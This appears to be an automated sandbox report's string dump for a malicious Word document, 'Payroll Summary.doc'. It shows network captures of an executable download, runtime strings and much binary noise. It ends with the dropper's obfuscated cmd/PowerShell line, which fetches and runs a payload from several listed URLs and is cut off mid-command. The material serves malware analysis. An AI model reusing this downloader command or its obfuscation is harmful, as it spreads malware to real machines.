GET / HTTP/1.1Cookie: 62407=0mqUhhn6Ge6ZIHkHU3CFqP7xYqej0rGgy+wGw5ndDq8Y7dmCX0C+18pBoXCPgtAI2AHEproTMZTQxYa3eOceuxKqyh1npx8An8iLKyndBa/Y8Il01WMZjWWmaa80aiXHMR2kbeze2Gp/QYLpxFl2h9lrC/EbDA8+MCECMhL+SY3/p9PE0uGMes2MadeydHxmHjs9Vmu0DNJJgHVDAObrjzLwhtwyJk0uKPdKHgMdMlPY+0lHdSuMkdvJTjwYjtcVybE5moUeIkTxLhS36xYp+NFW7H0HCHo2VbKT9VXp1K4nFGaCph+4I7J1wyA2XsEb8DrYkoSk//Txln5mc++AKekbssIuRj0POoRkrbRjGI86Sqq2uMAQrW7xW/LvOWwtZ1v7pWLi5YNW00Ium6x1h4AYn/s=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 81.21.67.85:8080Connection: Keep-AliveCache-Control: no-cache
Ansi based on PCAP Processing
(network.pcap)
GET /76j4qo/ HTTP/1.1Host: ifcingenieria.clConnection: Keep-Alive
Ansi based on PCAP Processing
(network.pcap)
HTTP/1.1 200 OKDate: Thu, 17 May 2018 13:55:54 GMTServer: ApacheX-Powered-By: PHP/5.5.36Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="87090.exe"Content-Transfer-Encoding: binaryKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: application/octet-stream3a000MZ
Ansi based on PCAP Processing
(network.pcap)
HTTP/1.1 200 OKServer: nginxDate: Thu, 17 May 2018 13:56:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 132Connection: keep-alive
Ansi based on PCAP Processing
(network.pcap)
hW0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
i"}W0~0Y0
Ansi based on PCAP Processing
(network.pcap)
ifcingenieria
Ansi based on PCAP Processing
(network.pcap)
k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
k0ckW0O0j0D0
Ansi based on PCAP Processing
(network.pcap)
KERNEL32.dll
Ansi based on PCAP Processing
(network.pcap)
kwrhWEj#@hw
Ansi based on PCAP Processing
(network.pcap)
LOFT9159-XL
Ansi based on PCAP Processing
(network.pcap)
n0%Rn0MOn
Ansi based on PCAP Processing
(network.pcap)
Nk0&Ny0f0h
Ansi based on PCAP Processing
(network.pcap)
O(u-Nn0_0
Ansi based on PCAP Processing
(network.pcap)
O(u-N~0_0o0
Ansi based on PCAP Processing
(network.pcap)
O(ug0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
O(uW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
O0S0h0k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
Ok01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
OX[g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
OX[k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
OX[W0f0CQn0
Ansi based on PCAP Processing
(network.pcap)
OX[W0j0D0
Ansi based on PCAP Processing
(network.pcap)
OX[W0~0Y0
Ansi based on PCAP Processing
(network.pcap)
OX[W0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
PSPUBWS-PC
Ansi based on PCAP Processing
(network.pcap)
QEhjejeher
Ansi based on PCAP Processing
(network.pcap)
QW0L0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
R\OW0j0D0
Ansi based on PCAP Processing
(network.pcap)
RemoveMenu
Ansi based on PCAP Processing
(network.pcap)
Rk01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
rKak0;bW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
rKak0;bY0(
Ansi based on PCAP Processing
(network.pcap)
RL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
RrRW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
RW0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
Sg0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
Sk0&Ny0f0h
Ansi based on PCAP Processing
(network.pcap)
SL0Nckg0Y0
Ansi based on PCAP Processing
(network.pcap)
Tc0f0D0j0D0
Ansi based on PCAP Processing
(network.pcap)
USER32.dll
Ansi based on PCAP Processing
(network.pcap)
uW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
VK)NFq"=
Ansi based on PCAP Processing
(network.pcap)
W0f0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
W0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
W0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
W0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
wekjwHjEJ
Ansi based on PCAP Processing
(network.pcap)
x0n0Y0y0f0n0Y
Ansi based on PCAP Processing
(network.pcap)
Yg0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
YY0N0~0Y0
Ansi based on PCAP Processing
(network.pcap)
{W0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
}k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
~0g0n0peW[
Ansi based on PCAP Processing
(network.pcap)
~0g0n0tepe
Ansi based on PCAP Processing
(network.pcap)
%windir%\tracing
Unicode based on Runtime Data
(powershell.exe
)
`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data
(powershell.exe
)
ConsoleTracingMask
Unicode based on Runtime Data
(powershell.exe
)
EnableConsoleTracing
Unicode based on Runtime Data
(powershell.exe
)
EnableFileTracing
Unicode based on Runtime Data
(powershell.exe
)
FileDirectory
Unicode based on Runtime Data
(powershell.exe
)
FileTracingMask
Unicode based on Runtime Data
(powershell.exe
)
LanguageList
Unicode based on Runtime Data
(powershell.exe
)
MaxFileSize
Unicode based on Runtime Data
(powershell.exe
)
UNCAsIntranet
Unicode based on Runtime Data
(powershell.exe
)
�������
Ansi based on Runtime Data
(powershell.exe
)
���������
Ansi based on Runtime Data
(powershell.exe
)
������������
Ansi based on Runtime Data
(powershell.exe
)
��������������
Ansi based on Runtime Data
(powershell.exe
)
������������������������
Ansi based on Runtime Data
(powershell.exe
)
��������������������������
Ansi based on Runtime Data
(powershell.exe
)
����������������������������
Ansi based on Runtime Data
(powershell.exe
)
������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�����������������������������������������������������������?����������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�����������������������������������������������������������?��������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
���������������������������������������������������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
'_=''___''i_'=__=__i
Ansi based on Image Processing
(screen_5.png)
0___D',0_'__0__'
Ansi based on Image Processing
(screen_5.png)
__::_::__
Ansi based on Image Processing
(screen_5.png)
_______Find'
Ansi based on Image Processing
(screen_5.png)
__Replace
Ansi based on Image Processing
(screen_5.png)
_l.8_0''._
Ansi based on Image Processing
(screen_5.png)
_Norma__Nosaci
Ansi based on Image Processing
(screen_5.png)
_s_gt_qsg_gct_
Ansi based on Image Processing
(screen_5.png)
attempting
Ansi based on Image Processing
(screen_5.png)
Clipbaard
Ansi based on Image Processing
(screen_5.png)
HeadinLHeadin_
Ansi based on Image Processing
(screen_5.png)
micr0s0ftw0rd
Ansi based on Image Processing
(screen_5.png)
Micrasaft
Ansi based on Image Processing
(screen_5.png)
PageLayaut
Ansi based on Image Processing
(screen_5.png)
Reference_
Ansi based on Image Processing
(screen_5.png)
summay_c0mpatibi_i_m0de_
Ansi based on Image Processing
(screen_5.png)
( <EQEQEQEQEQEQEQEQEQEQEQHI(((((j666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666v62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ OJPJQJ_HmHnHsHtHJ`JNormaldCJ_HaJmHsHtHDA D
Ansi based on Dropped File
(~WRD0003.tmp)
cW1Table4WordDocumentSummaryInformation(DDocumentSummaryInformation8L
Ansi based on Dropped File
(~WRD0003.tmp)
hn^ jheh,UmHnHuh$mHnHuhmHnHu,1h/ =!"#$%cWDd
Ansi based on Dropped File
(~WRD0003.tmp)
Ryfewu59531Ryfewujashowavae46504Title
Ansi based on Dropped File
(~WRD0003.tmp)
V.V.V.V.V.V.V.V.V.Project.HULSuHBvj.HqLkvVSjBLWProject.izosJmiC.wSTJsProject.izosJmiC.VCRPjlvProject.zTZADLcFXJtFRE.AutoopenProject.izosJmiC.wQpJmProject.izosJmiC.tGYJQProject.izosJmiC.zPHvPqrDOGFFzXProject.izosJmiC.SmZcwProject.izosJmiC.kOjwcPROJECT.IZOSJMIC.KOJWCPROJECT.IZOSJMIC.SMZCWPROJECT.IZOSJMIC.TGYJQPROJECT.IZOSJMIC.WQPJMPROJECT.IZOSJMIC.WSTJSPROJECT.IZOSJMIC.VCRPJLVPROJECT.HULSUHBVJ.HQLKVVSJBLWPROJECT.IZOSJMIC.ZPHVPQRDOGFFZXPROJECT.ZTZADLCFXJTFRE.AUTOOPEN@H@UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@Calibri5..[`)TahomaA$BCambria Math"1hee!0iQp@P$Pn^6!xxRyfewujashowavae46504Ryfewujasho58022Oh+'0
Ansi based on Dropped File
(~WRD0003.tmp)
Xdlt|Ryfewujashowavae46504Ryfewujasho58022Normal1Microsoft Office Word@@(@Z`+.+,0,x
Ansi based on Dropped File
(~WRD0003.tmp)
-_--_-----_t__-___
Ansi based on Image Processing
(screen_0.png)
;-._,-._,-.
Ansi based on Image Processing
(screen_0.png)
_0em____ofFce_365
Ansi based on Image Processing
(screen_0.png)
AaBbCcD(
Ansi based on Image Processing
(screen_0.png)
agl7lpayr011
Ansi based on Image Processing
(screen_0.png)
aPPr0x_ma__
Ansi based on Image Processing
(screen_0.png)
attempt_ng
Ansi based on Image Processing
(screen_0.png)
B_U__x,x'
Ansi based on Image Processing
(screen_0.png)
charact_rc
Ansi based on Image Processing
(screen_0.png)
Cl_pbaard
Ansi based on Image Processing
(screen_0.png)
H,ad_ngLH,ad_ng_-Chan9,
Ansi based on Image Processing
(screen_0.png)
m_cr0s0ftw0rd
Ansi based on Image Processing
(screen_0.png)
M_crasaft
Ansi based on Image Processing
(screen_0.png)
nNarma_nNaspac_
Ansi based on Image Processing
(screen_0.png)
Pag,Layaut
Ansi based on Image Processing
(screen_0.png)
Paragraph
Ansi based on Image Processing
(screen_0.png)
ProIected
Ansi based on Image Processing
(screen_0.png)
R,f,r,nc,_
Ansi based on Image Processing
(screen_0.png)
summay_c0mpat_b____m0de_
Ansi based on Image Processing
(screen_0.png)
v_R,PlaC,
Ansi based on Image Processing
(screen_0.png)
/n "C:\09172 Payroll Summary.doc"
Ansi based on Process Commandline
(WINWORD.EXE)
019C826E445A4649A5B00BF08FCC4EEE
Unicode based on Runtime Data
(WINWORD.EXE
)
@Arial Unicode MS
Unicode based on Runtime Data
(WINWORD.EXE
)
@DFKai-SB
Unicode based on Runtime Data
(WINWORD.EXE
)
@DotumChe
Unicode based on Runtime Data
(WINWORD.EXE
)
@Microsoft JhengHei
Unicode based on Runtime Data
(WINWORD.EXE
)
@MingLiU_HKSCS-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS PGothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS UI Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@PMingLiU
Unicode based on Runtime Data
(WINWORD.EXE
)
@SimSun-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D3EE2989979980][O00000000]*C:\
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D3EE2989979980][O00000000]*C:\09172 Payroll Summary.doc
Unicode based on Runtime Data
(WINWORD.EXE
)
`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data
(WINWORD.EXE
)
AgentAnim
Unicode based on Runtime Data
(WINWORD.EXE
)
Algerian
Unicode based on Runtime Data
(WINWORD.EXE
)
Angsana New
Unicode based on Runtime Data
(WINWORD.EXE
)
Arabic Typesetting
Unicode based on Runtime Data
(WINWORD.EXE
)
Arial Narrow
Unicode based on Runtime Data
(WINWORD.EXE
)
Arial Unicode MS
Unicode based on Runtime Data
(WINWORD.EXE
)
AutoDetect
Unicode based on Runtime Data
(WINWORD.EXE
)
Bauhaus 93
Unicode based on Runtime Data
(WINWORD.EXE
)
Berlin Sans FB Demi
Unicode based on Runtime Data
(WINWORD.EXE
)
Blackadder ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Bodoni MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Bodoni MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Book Antiqua
Unicode based on Runtime Data
(WINWORD.EXE
)
Bookman Old Style
Unicode based on Runtime Data
(WINWORD.EXE
)
Bradley Hand ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
BrowalliaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Californian FB
Unicode based on Runtime Data
(WINWORD.EXE
)
Cambria Math
Unicode based on Runtime Data
(WINWORD.EXE
)
Castellar
Unicode based on Runtime Data
(WINWORD.EXE
)
Century Schoolbook
Unicode based on Runtime Data
(WINWORD.EXE
)
Comic Sans MS
Unicode based on Runtime Data
(WINWORD.EXE
)
Cooper Black
Unicode based on Runtime Data
(WINWORD.EXE
)
Copperplate Gothic Light
Unicode based on Runtime Data
(WINWORD.EXE
)
CordiaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Courier New
Unicode based on Runtime Data
(WINWORD.EXE
)
DilleniaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
DotumChe
Unicode based on Runtime Data
(WINWORD.EXE
)
Edwardian Script ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Elephant
Unicode based on Runtime Data
(WINWORD.EXE
)
Eras Bold ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Eras Light ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Eras Medium ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
EucrosiaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Euphemia
Unicode based on Runtime Data
(WINWORD.EXE
)
EXCELFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
Felix Titling
Unicode based on Runtime Data
(WINWORD.EXE
)
FontInfoCacheW
Unicode based on Runtime Data
(WINWORD.EXE
)
Footlight MT Light
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Demi
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Demi Cond
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Medium
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Medium Cond
Unicode based on Runtime Data
(WINWORD.EXE
)
FreesiaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Freestyle Script
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans MT Ext Condensed Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans Ultra Bold Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Goudy Old Style
Unicode based on Runtime Data
(WINWORD.EXE
)
Goudy Stout
Unicode based on Runtime Data
(WINWORD.EXE
)
Grammar Only
Unicode based on Runtime Data
(WINWORD.EXE
)
GulimChe
Unicode based on Runtime Data
(WINWORD.EXE
)
GungsuhChe
Unicode based on Runtime Data
(WINWORD.EXE
)
Harlow Solid Italic
Unicode based on Runtime Data
(WINWORD.EXE
)
Harrington
Unicode based on Runtime Data
(WINWORD.EXE
)
Imprint MT Shadow
Unicode based on Runtime Data
(WINWORD.EXE
)
IntranetName
Unicode based on Runtime Data
(WINWORD.EXE
)
Iskoola Pota
Unicode based on Runtime Data
(WINWORD.EXE
)
JasmineUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Juice ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Khmer UI
Unicode based on Runtime Data
(WINWORD.EXE
)
Kristen ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
LastPurgeTime
Unicode based on Runtime Data
(WINWORD.EXE
)
Levenim MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Bright
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Console
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Fax
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Handwriting
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Sans Typewriter
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Sans Unicode
Unicode based on Runtime Data
(WINWORD.EXE
)
Malgun Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
Matura MT Script Capitals
Unicode based on Runtime Data
(WINWORD.EXE
)
Max Display
Unicode based on Runtime Data
(WINWORD.EXE
)
Meiryo UI
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft JhengHei
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft New Tai Lue
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft PhagsPa
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Sans Serif
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Uighur
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft YaHei
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Yi Baiti
Unicode based on Runtime Data
(WINWORD.EXE
)
MingLiU-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
MingLiU_HKSCS
Unicode based on Runtime Data
(WINWORD.EXE
)
MingLiU_HKSCS-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
Miriam Fixed
Unicode based on Runtime Data
(WINWORD.EXE
)
Modern No. 20
Unicode based on Runtime Data
(WINWORD.EXE
)
Monotype Corsiva
Unicode based on Runtime Data
(WINWORD.EXE
)
MoolBoran
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Outlook
Unicode based on Runtime Data
(WINWORD.EXE
)
MS PGothic
Unicode based on Runtime Data
(WINWORD.EXE
)
MS PMincho
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Reference Specialty
Unicode based on Runtime Data
(WINWORD.EXE
)
MSOBALLOON
Unicode based on Runtime Data
(WINWORD.EXE
)
MsoCommandBarPopup
Unicode based on Runtime Data
(WINWORD.EXE
)
MsoHelp10
Unicode based on Runtime Data
(WINWORD.EXE
)
mspim_wnd32
Unicode based on Runtime Data
(WINWORD.EXE
)
MT Extra
Unicode based on Runtime Data
(WINWORD.EXE
)
NetUICtrlNotifySink
Unicode based on Runtime Data
(WINWORD.EXE
)
NextUpdate
Unicode based on Runtime Data
(WINWORD.EXE
)
Niagara Engraved
Unicode based on Runtime Data
(WINWORD.EXE
)
Niagara Solid
Unicode based on Runtime Data
(WINWORD.EXE
)
OCR A Extended
Unicode based on Runtime Data
(WINWORD.EXE
)
OfficeTooltip
Unicode based on Runtime Data
(WINWORD.EXE
)
Old English Text MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Options Version
Unicode based on Runtime Data
(WINWORD.EXE
)
Palace Script MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Palatino Linotype
Unicode based on Runtime Data
(WINWORD.EXE
)
Parchment
Unicode based on Runtime Data
(WINWORD.EXE
)
Perpetua Titling MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Plantagenet Cherokee
Unicode based on Runtime Data
(WINWORD.EXE
)
PMingLiU-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
Poor Richard
Unicode based on Runtime Data
(WINWORD.EXE
)
ProductFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
ProxyBypass
Unicode based on Runtime Data
(WINWORD.EXE
)
Rage Italic
Unicode based on Runtime Data
(WINWORD.EXE
)
REListbox20W
Unicode based on Runtime Data
(WINWORD.EXE
)
Rockwell Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Rockwell Extra Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Sakkal Majalla
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe Print
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe Script
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe UI Semibold
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe UI Symbol
Unicode based on Runtime Data
(WINWORD.EXE
)
Shonar Bangla
Unicode based on Runtime Data
(WINWORD.EXE
)
Showcard Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
Simplified Arabic
Unicode based on Runtime Data
(WINWORD.EXE
)
Simplified Arabic Fixed
Unicode based on Runtime Data
(WINWORD.EXE
)
SimSun-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
Snap ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
SpellingAndGrammarFiles_1033
Unicode based on Runtime Data
(WINWORD.EXE
)
SpellingAndGrammarFiles_1036
Unicode based on Runtime Data
(WINWORD.EXE
)
SpellingAndGrammarFiles_3082
Unicode based on Runtime Data
(WINWORD.EXE
)
Tempus Sans ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Times New Roman
Unicode based on Runtime Data
(WINWORD.EXE
)
Traditional Arabic
Unicode based on Runtime Data
(WINWORD.EXE
)
Tw Cen MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Tw Cen MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Tw Cen MT Condensed Extra Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
VBAFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
Viner Hand ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Vladimir Script
Unicode based on Runtime Data
(WINWORD.EXE
)
Webdings
Unicode based on Runtime Data
(WINWORD.EXE
)
Wide Latin
Unicode based on Runtime Data
(WINWORD.EXE
)
Wingdings
Unicode based on Runtime Data
(WINWORD.EXE
)
Wingdings 2
Unicode based on Runtime Data
(WINWORD.EXE
)
Wingdings 3
Unicode based on Runtime Data
(WINWORD.EXE
)
WordBibliographyFilesIntl_1033
Unicode based on Runtime Data
(WINWORD.EXE
)
WORDFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
�����
Ansi based on Runtime Data
(WINWORD.EXE
)
������
Ansi based on Runtime Data
(WINWORD.EXE
)
��������
Ansi based on Runtime Data
(WINWORD.EXE
)
�������������
Ansi based on Runtime Data
(WINWORD.EXE
)
����������������
Ansi based on Runtime Data
(WINWORD.EXE
)
�����������������
Ansi based on Runtime Data
(WINWORD.EXE
)
81.21.67.85
Ansi based on PCAP Processing
(PCAP)
ifcingenieria.cl
Ansi based on PCAP Processing
(PCAP)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Ansi based on PCAP Processing
(PCAP)
>Root EntryWordDocument
Ansi based on Dropped File
(~WRD0002.tmp)
__?m?J?__?_q___?????v_,?_?_???__,_____??_J,m____L___
Ansi based on Image Processing
(screen_9.png)
__Ah|yABLyR5|D|5
Ansi based on Image Processing
(screen_9.png)
AutoConfigURL
Unicode based on Runtime Data
(cmnmspthrd.exe
)
DefaultConnectionSettings
Unicode based on Runtime Data
(cmnmspthrd.exe
)
ProxyEnable
Unicode based on Runtime Data
(cmnmspthrd.exe
)
ProxyOverride
Unicode based on Runtime Data
(cmnmspthrd.exe
)
SavedLegacySettings
Unicode based on Runtime Data
(cmnmspthrd.exe
)
WpadDecision
Unicode based on Runtime Data
(cmnmspthrd.exe
)
WpadDecisionReason
Unicode based on Runtime Data
(cmnmspthrd.exe
)
WpadDecisionTime
Unicode based on Runtime Data
(cmnmspthrd.exe
)
WpadLastNetwork
Unicode based on Runtime Data
(cmnmspthrd.exe
)
{09477111-DE61-43CD-A5AA-D9F7B489301F}
Unicode based on Runtime Data
(cmnmspthrd.exe
)
���/����
Ansi based on Runtime Data
(cmnmspthrd.exe
)
����?���������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
��������?�����������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
����������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
�������������/���/��
Ansi based on Runtime Data
(cmnmspthrd.exe
)
�������������/���/���
Ansi based on Runtime Data
(cmnmspthrd.exe
)
�������������/����������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
��������������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
�����������������������������������������������������������?������������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
�������������������������������������������������������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
��������������������������������������������������������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
��������������������������������������������������������������������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
��������������������������������������������������������������������������������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 